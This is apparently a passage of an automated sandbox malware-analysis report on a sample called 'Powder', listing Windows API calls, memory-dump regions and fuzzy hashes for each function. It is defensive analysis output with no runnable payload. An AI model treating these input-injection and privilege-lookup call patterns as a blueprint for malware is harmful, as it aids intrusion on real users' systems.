                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID:
                                                  • API String ID: 4218353326-0
                                                  • Opcode ID: 69b8bff804a8c5544af30bf712d2f2b195d6964992e54e701f3bf1cd76e5ff03
                                                  • Instruction ID: 494c5d174707d817adf035cf8d396f9200a7a380ec990566182558ea53ca03de
                                                  • Opcode Fuzzy Hash: 69b8bff804a8c5544af30bf712d2f2b195d6964992e54e701f3bf1cd76e5ff03
                                                  • Instruction Fuzzy Hash: 9741F171600508AFCB14EBA4DD81EEEB7E9EF54314F10A155F81ABB2D2DB30AD41CB90
                                                  APIs
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E88F03
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InvalidateRect
                                                  • String ID:
                                                  • API String ID: 634782764-0
                                                  • Opcode ID: 7a8b3cde11927c22afee014979061720e97c6a9f8982feed3f826d0618410e14
                                                  • Instruction ID: 00279482531cd74146bf1a4388a8a039e27680332116b97654dbeb021b44f661
                                                  • Opcode Fuzzy Hash: 7a8b3cde11927c22afee014979061720e97c6a9f8982feed3f826d0618410e14
                                                  • Instruction Fuzzy Hash: 5331CD3074010CAFEB34AA18CE49FA837A6AB05324F946512FF5DF61A1CF71E950CB51
                                                  APIs
                                                  • ClientToScreen.USER32(?,?), ref: 00E8B1D2
                                                  • GetWindowRect.USER32(?,?), ref: 00E8B248
                                                  • PtInRect.USER32(?,?,00E8C6BC), ref: 00E8B258
                                                  • MessageBeep.USER32(00000000), ref: 00E8B2C9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                  • String ID:
                                                  • API String ID: 1352109105-0
                                                  • Opcode ID: 7b8eac4ec046c7ee82de0cfe0cb65132e4401de9775a1a255f0522c0b0814d34
                                                  • Instruction ID: f9bc8b02fcdc7aab3a305e505da07f105089048bb664e0ed2ff80d32c6628c5b
                                                  • Opcode Fuzzy Hash: 7b8eac4ec046c7ee82de0cfe0cb65132e4401de9775a1a255f0522c0b0814d34
                                                  • Instruction Fuzzy Hash: 9541CD31A04119DFCB25EF99C884EAD7BF5FF49314F1894A9E96CAB261D331A805CF50
                                                  APIs
                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E61326
                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00E61342
                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00E613A8
                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00E613FA
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: 0ff309edb923d6db9cb2bbe61c8f421016d3afb4732bd4f310b79ccf8dd48a4e
                                                  • Instruction ID: 253daae32018c64c32a292ebd1cb23f7a48f9c9f69a71ccf7edadd0e5ccb6d1f
                                                  • Opcode Fuzzy Hash: 0ff309edb923d6db9cb2bbe61c8f421016d3afb4732bd4f310b79ccf8dd48a4e
                                                  • Instruction Fuzzy Hash: B8317E309C0218AEFF328B25AC057FE7BB9AB44394F0D529BE092727D1D3744D459B55
                                                  APIs
                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E61465
                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E61481
                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E614E0
                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E61532
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: KeyboardState$InputMessagePostSend
                                                  • String ID:
                                                  • API String ID: 432972143-0
                                                  • Opcode ID: ffa96fe3e93cb12ffe6a486270ef1f5639dc51bee3aea743449b67120e71b054
                                                  • Instruction ID: 99f40d212a66993763c50b88bb3d9286d6d6936841715515b13c6af934278cf9
                                                  • Opcode Fuzzy Hash: ffa96fe3e93cb12ffe6a486270ef1f5639dc51bee3aea743449b67120e71b054
                                                  • Instruction Fuzzy Hash: D8317A30DC02185EFF368A65AC04BFABBA5AB84394F0C538BE0A1731D1C73489459B62
                                                  APIs
                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E3642B
                                                  • __isleadbyte_l.LIBCMT ref: 00E36459
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E36487
                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00E364BD
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                  • String ID:
                                                  • API String ID: 3058430110-0
                                                  • Opcode ID: f111ab4fb292798dc73ecdb20461e035296b6caac98effd68cbdd53466e1b584
                                                  • Instruction ID: 13b92421e0ba1f558e7eef77254370a98acdf14788ed0772bdc465d0b91ba458
                                                  • Opcode Fuzzy Hash: f111ab4fb292798dc73ecdb20461e035296b6caac98effd68cbdd53466e1b584
                                                  • Instruction Fuzzy Hash: 6C31AD31A00256BFDB218F75CC49AAA7FF9FF41324F159069E874A71A1EB31E850DB90
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00E8553F
                                                    • Part of subcall function 00E63B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E63B4E
                                                    • Part of subcall function 00E63B34: GetCurrentThreadId.KERNEL32 ref: 00E63B55
                                                    • Part of subcall function 00E63B34: AttachThreadInput.USER32(00000000,?,00E655C0), ref: 00E63B5C
                                                  • GetCaretPos.USER32(?), ref: 00E85550
                                                  • ClientToScreen.USER32(00000000,?), ref: 00E8558B
                                                  • GetForegroundWindow.USER32 ref: 00E85591
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                  • String ID:
                                                  • API String ID: 2759813231-0
                                                  • Opcode ID: 16c1bc5d92e5be43b2a91e19b5e7c35223bde9b779f0c507ca71aeaaf542ac8c
                                                  • Instruction ID: b4ebd30f07422cb772ac066b8af416ceccdf99384f1aa50d0f2e4cb053827371
                                                  • Opcode Fuzzy Hash: 16c1bc5d92e5be43b2a91e19b5e7c35223bde9b779f0c507ca71aeaaf542ac8c
                                                  • Instruction Fuzzy Hash: 73312EB1900108AFDB00EFB5DD85DEEB7F9EF94304F10506AE915F7281EA75AE448BA0
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • GetCursorPos.USER32(?), ref: 00E8CB7A
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E3BCEC,?,?,?,?,?), ref: 00E8CB8F
                                                  • GetCursorPos.USER32(?), ref: 00E8CBDC
                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E3BCEC,?,?,?), ref: 00E8CC16
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                  • String ID:
                                                  • API String ID: 2864067406-0
                                                  • Opcode ID: fda913f0cba6b5f743a19cf9e18b31e485309a6bf8da23e1516684ce110c1520
                                                  • Instruction ID: 722104d78c8ec66ad4590e5bf321598e76a2d5cf8d54afd83093cf649390b3f3
                                                  • Opcode Fuzzy Hash: fda913f0cba6b5f743a19cf9e18b31e485309a6bf8da23e1516684ce110c1520
                                                  • Instruction Fuzzy Hash: F231EE35600418AFCB259F59C849EFA7BF9EB4A310F5044AAF90DBB261C3319D51EFA0
                                                  APIs
                                                  • __setmode.LIBCMT ref: 00E20BE2
                                                    • Part of subcall function 00E1402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67E51,?,?,00000000), ref: 00E14041
                                                    • Part of subcall function 00E1402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67E51,?,?,00000000,?,?), ref: 00E14065
                                                  • _fprintf.LIBCMT ref: 00E20C19
                                                  • OutputDebugStringW.KERNEL32(?), ref: 00E5694C
                                                    • Part of subcall function 00E24CCA: _flsall.LIBCMT ref: 00E24CE3
                                                  • __setmode.LIBCMT ref: 00E20C4E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                  • String ID:
                                                  • API String ID: 521402451-0
                                                  • Opcode ID: 951523a1356f78ba5980ebedee5a023436330b117f5a38c87d2f7fdd4cedb069
                                                  • Instruction ID: 3fdc81b9591886c88ac9eb783e92d448804e7e82e8e885d475c5c9d3ba6062b4
                                                  • Opcode Fuzzy Hash: 951523a1356f78ba5980ebedee5a023436330b117f5a38c87d2f7fdd4cedb069
                                                  • Instruction Fuzzy Hash: A51124F29042247ECB08B7A4BC439FEBBAD9F80321F14215AF204772C2DF71189687A1
                                                  APIs
                                                    • Part of subcall function 00E58D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58D3F
                                                    • Part of subcall function 00E58D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D49
                                                    • Part of subcall function 00E58D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D58
                                                    • Part of subcall function 00E58D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D5F
                                                    • Part of subcall function 00E58D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58D75
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E592C1
                                                  • _memcmp.LIBCMT ref: 00E592E4
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E5931A
                                                  • HeapFree.KERNEL32(00000000), ref: 00E59321
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                  • String ID:
                                                  • API String ID: 1592001646-0
                                                  • Opcode ID: 52bd8cb1f8100a60f1cc0c7323870b676e00bcbfb5bc7ec9b35d4e6520651d32
                                                  • Instruction ID: 5faf5162f834600ff4459a55ac0e9991e5c0cacccbf2d181b12525b0eab9bd0e
                                                  • Opcode Fuzzy Hash: 52bd8cb1f8100a60f1cc0c7323870b676e00bcbfb5bc7ec9b35d4e6520651d32
                                                  • Instruction Fuzzy Hash: 3121BD32E00108EFCB10CFA5C945BEEB7F8EF44306F04545AE845B7291D770AA08DB90
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00E863BD
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E863D7
                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E863E5
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E863F3
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$Long$AttributesLayered
                                                  • String ID:
                                                  • API String ID: 2169480361-0
                                                  • Opcode ID: 115426a345ac285881facfd7badfb27aa3791ff0c771d9f50579aac2d1dd9c8f
                                                  • Instruction ID: a6ba77959c83b041529b290a2521babdee63a9d57315b945999075b76b62bdbc
                                                  • Opcode Fuzzy Hash: 115426a345ac285881facfd7badfb27aa3791ff0c771d9f50579aac2d1dd9c8f
                                                  • Instruction Fuzzy Hash: 1A110031305414AFD704BB24CC45FBE77A9EF85320F14611AF91AEB2D2CBA0AC40CB90
                                                  APIs
                                                    • Part of subcall function 00E5F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E5E46F,?,?,?,00E5F262,00000000,000000EF,00000119,?,?), ref: 00E5F867
                                                    • Part of subcall function 00E5F858: lstrcpyW.KERNEL32(00000000,?,?,00E5E46F,?,?,?,00E5F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E5F88D
                                                    • Part of subcall function 00E5F858: lstrcmpiW.KERNEL32(00000000,?,00E5E46F,?,?,?,00E5F262,00000000,000000EF,00000119,?,?), ref: 00E5F8BE
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E5F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E5E488
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00E5F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E5E4AE
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E5F262,00000000,000000EF,00000119,?,?,00000000), ref: 00E5E4E2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: e028dcdb89647ea6d34de7793632b488e7ae130a946c0ff4567d26c4af80cf27
                                                  • Instruction ID: 51b438189fdffe691433a78e4f25b73c81b1b2a1ca35f4d00eed0c61fea771a4
                                                  • Opcode Fuzzy Hash: e028dcdb89647ea6d34de7793632b488e7ae130a946c0ff4567d26c4af80cf27
                                                  • Instruction Fuzzy Hash: 0011B13A200345BFDB299F24D845D7A77A8FF45355B80542BFC06DB2A0EB319A44C791
                                                  APIs
                                                  • _free.LIBCMT ref: 00E35331
                                                    • Part of subcall function 00E2593C: __FF_MSGBANNER.LIBCMT ref: 00E25953
                                                    • Part of subcall function 00E2593C: __NMSG_WRITE.LIBCMT ref: 00E2595A
                                                    • Part of subcall function 00E2593C: RtlAllocateHeap.NTDLL(01790000,00000000,00000001,?,00000004,?,?,00E21003,?), ref: 00E2597F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: 1e6d0096b96979e86ff1e6f2af7ee0ed28d34a74ccf6739119b7be3c5e54cd17
                                                  • Instruction ID: 601deef1802d400479cff78fd67ee0447eec2d5451efeb7e7e98b435aa172ec8
                                                  • Opcode Fuzzy Hash: 1e6d0096b96979e86ff1e6f2af7ee0ed28d34a74ccf6739119b7be3c5e54cd17
                                                  • Instruction Fuzzy Hash: 57110D33506A25AFCB203F70FC0969E3FD89F147A4F106527F818B6290DE748944C790
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E64385
                                                  • _memset.LIBCMT ref: 00E643A6
                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E643F8
                                                  • CloseHandle.KERNEL32(00000000), ref: 00E64401
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                  • String ID:
                                                  • API String ID: 1157408455-0
                                                  • Opcode ID: edda809b21b9777e87a8e1ddea8c3a926c35b06823a8fbccfd2529d1235a5bdc
                                                  • Instruction ID: 9c11a87086d261c3510b56683a3de1fcecd92dfd66e2b5fb6e688dc076e1e5fa
                                                  • Opcode Fuzzy Hash: edda809b21b9777e87a8e1ddea8c3a926c35b06823a8fbccfd2529d1235a5bdc
                                                  • Instruction Fuzzy Hash: A011CBB19412287ED7309B65AC4DFEBBB7CDF45760F004597F508E7190D6744E408AA4
                                                  APIs
                                                    • Part of subcall function 00E1402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67E51,?,?,00000000), ref: 00E14041
                                                    • Part of subcall function 00E1402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67E51,?,?,00000000,?,?), ref: 00E14065
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00E76A84
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E76A8F
                                                  • _memmove.LIBCMT ref: 00E76ABC
                                                  • inet_ntoa.WSOCK32(?), ref: 00E76AC7
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 9650e76ca0b5ad599a83b100b61766064701f8143aeb59908bef2ac5af967ec1
                                                  • Instruction ID: 15432bcf395380db4b13faba862cfc15f50dfc57ce077ee47fc1320747c24511
                                                  • Opcode Fuzzy Hash: 9650e76ca0b5ad599a83b100b61766064701f8143aeb59908bef2ac5af967ec1
                                                  • Instruction Fuzzy Hash: E01151B2A00109AFCB04EBA5CE46CEEB7F9AF18311B149065F506B72A1DF309E54CB91
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00E59719
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E5972B
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E59741
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E5975C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
